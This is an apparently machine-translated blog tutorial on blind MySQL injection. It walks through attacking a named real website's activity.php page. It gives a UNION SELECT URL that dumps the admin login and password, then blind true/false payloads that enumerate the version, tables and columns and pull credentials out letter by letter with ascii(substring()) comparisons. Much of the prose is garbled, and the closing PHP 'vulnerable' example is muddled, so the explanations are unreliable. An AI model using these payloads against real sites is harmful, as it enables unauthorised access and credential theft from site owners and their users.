[Tutorial] Blind MySQL Injection

20:05 sql injection, Website hacking No comments

Many web developers use SQL language, is difficult to use.From the simplest to the list with the database, update, insert operations
are done. However, while this process we use the web programming language; SQL language can cut into very dangerous
situations. Besides the danger of a programming language developers leave the door open because of the danger of this type exist.

Sql injection; added to any part of the query with the characters recognizable.

For example:
http://www.site.com/konu.php?id=25 section (25) after throwing an apostrophe, so /konu.php?id=25 'cases referred by the true
return false is checked. Blind SQL page for us the important thing is that they turn true and false. If you ask how we detect blind sql I
should have known that the simplest method and query the page and check the status of being true or false, I would like to show.

True -> http://www.site.com/konu.php?id=25 and 1 = 1
False -> http://www.site.com/konu.php?id=25 and 1 = 2
So even if you come smoothly page 1 = 1 is equal to 1 = 2 is equal, but the decrease etc. If you have some data on the page (such
as the absence of data from the database) then we are caught in Blind SQL. Now with PHP & MySQL blind injection of a foreign
security weaknesses through the website let's start our practice by giving examples.

~ NORMAL SQL Injection is written assuming that you KNOW THIS ARTICLE ~

At first, let me start by saying; In this example, the MySQL website but there is Blind SQL Injection SQL queries eats normally
displayed data reflects that. Blind SQL Injection is not reflected in the data to the screen never! We based true-false data, we build
ourselves. I first applying the normal sql queries I received information of the site admin, sorghum in this way;

http://www.bozar.be/activity.php?id=11214+and+1=2+union+select+version(),database(),user(),4,5,6,7,8,9,concat(login,0x3a
,password),11,12,13,14,15,16,17+from+users--

As seen in the table where our name: users, column (a column) Our name: login and password.Let me also add a picture of the
display output:


By admin part here; we want to obtain the administrator (admin) is our knowledge. That came as md5 password.

Now the same URL and 1 = 2 and 1 = 1 and let's see. So now we will do our tests with blind injection code:

Here we go ...

Let http://www.bozar.be/activity.php?id=11214 and 1 = 1. Page will normally encounter.

Let http://www.bozar.be/activity.php?id=11214 and 1 = 2. Page has been directed to 404.php'y. So a change has occurred. 1 =
1 if and when we do 404.php'y had dropped to just say nothing goes wrong but we were normal and 1 = 1 case (and 1 = 2) on the
page is wrong. That is as clear as blind SQL pumpkin?

Now let's check MySQL version if you wish.
http://www.bozar.be/activity.php?id=11214 and substring (version (), 1,1) = 4 pages made true (right) has returned. If I wrote
you 4 instead of 5 for version 5 is not going to eat at 404.php (you can try). HE Myql Version 4 of the way :)

Now choose the select command to accept so let's see.
http://www.bozar.be/activity.php?id=11214 + and + (select 1) = 1 page returned no problem continues still true.

Now, as more users find our table just told you blind Let's test table with the command;
http://www.bozar.be/activity.php?id=11214 and (select 1 from table limit 0,1) = 1 table name as a table now be at 404.php'y it
because I did not have a table name. Table Let's make someusers will seamlessly page, the table also shows that our
name users.

http://www.bozar.be/activity.php?id=11214 and (select 1 from users limit 0,1) = 1 returned more true.

Now users belong to table columns (columns) Let's test;
http://www.bozar.be/activity.php?id=11214 and (select substring (concat (1, column), 1,1) from users limit 0,1) = 1
This column will change the value to enter in this way because we still atcak to 404.php'y There's a column named column ..

http://www.bozar.be/activity.php?id=11214 and (select substring (concat (1, login), 1,1) from users limit 0,1) = 1
when we log any problems because it is a column named the page will return true. In other columnu found in the password.

Let's continue now login and password 'u ... I gradually combine 1.harf 2.harf 3.harf start to pull the data.

And begin to combine data from harf1;
http://www.bozar.be/activity.php?id=11214 and ascii (substring ((SELECT concat (in column1,0x3, column2) from table
limit 0,1), 1,1))> 97

Our command table, and column information yazcaz it here. What part of this 97? If the ASCII characters, the number of letters is
money.

www.asciitable.co from the address can browse these characters in detail. In addition, the code used for the blind injection
and blind injection cheat sheet details google can learn typing.

http://www.bozar.be/activity.php?id=11214 and ascii (substring ((SELECT concat (login, 0x3a, password) from users limit
0,1), 1,1))> 96 pages are coming properly , it is important to find where the page break .. So, where to return false. But before that I
want to clarify something.

Now these numbers according to what you write? Those who say you can.

As can be seen in asciitable.com all numbers between 0 and 127 can be written here. The number of page breaks before which it
will be our first letter of our data. (We can think of it as normal sql injection method before starting the blind sql injection normally
assume they know the subject)

http://www.bozar.be/activity.php?id=11214 and ascii (substring ((SELECT concat (login, 0x3a, password) from users limit
0,1), 1,1))> 97 was lost when we do page , was properly from 97 to 96, so 97's our our first letter. We are now looking at
asciitable.com 97, corresponding to the"a" that is, more especially in the picture just told you that the information in the form of
admin.Blind gives us the same result.

2.Harf:
http://www.bozar.be/activity.php?id=11214 and ascii (substring ((SELECT concat (login, 0x3a, password) from users limit
0,1), 2,1))> 99 now 2. 2.1 to 1.1 between the brackets for the letter we are changing the location.

2 we already know from the start that the letter d. asciitabl de "d" type of provision 100 pages it is going in anyway. 99 properly,
breaking 100. 2.harf d is happening. duplicating all the letters one by one so we're going to take. How do we know that the last letter
at the end of the page if you will not come to between 0 and 127 always returns true always returns true if the case is finished now.

Blind SQL is a very broad concept and as a result are very troublesome. But most large companies, including hosting it is clear that I
have personally come across great places ... Blind SQL query result page only difference from other species reflect the response,
that is, right and wrong. EXAMPLE guy we're leaving the door open to add our query is doing to our query says:

select * from users where userid = 1 says. 1 userid of the person's information page comes true calling. We're doing userid =
2 page breaks, but if this is a normal reaction spelling mistakes if our query turns into this blind sql. PHP and MySQL query for users
would like to give an example;
<? Php
$ Userid = (int) $ _GET ["userid"];
$ Query = mysql_query ("SELECT * FROM users WHERE userid = '$ userid'");
While ($ row = mysql_fetch_array ($ query)) {
Form of data ...
}
?>

If you write this kind of queries and data confirmed that the integer can be if you leave the door open!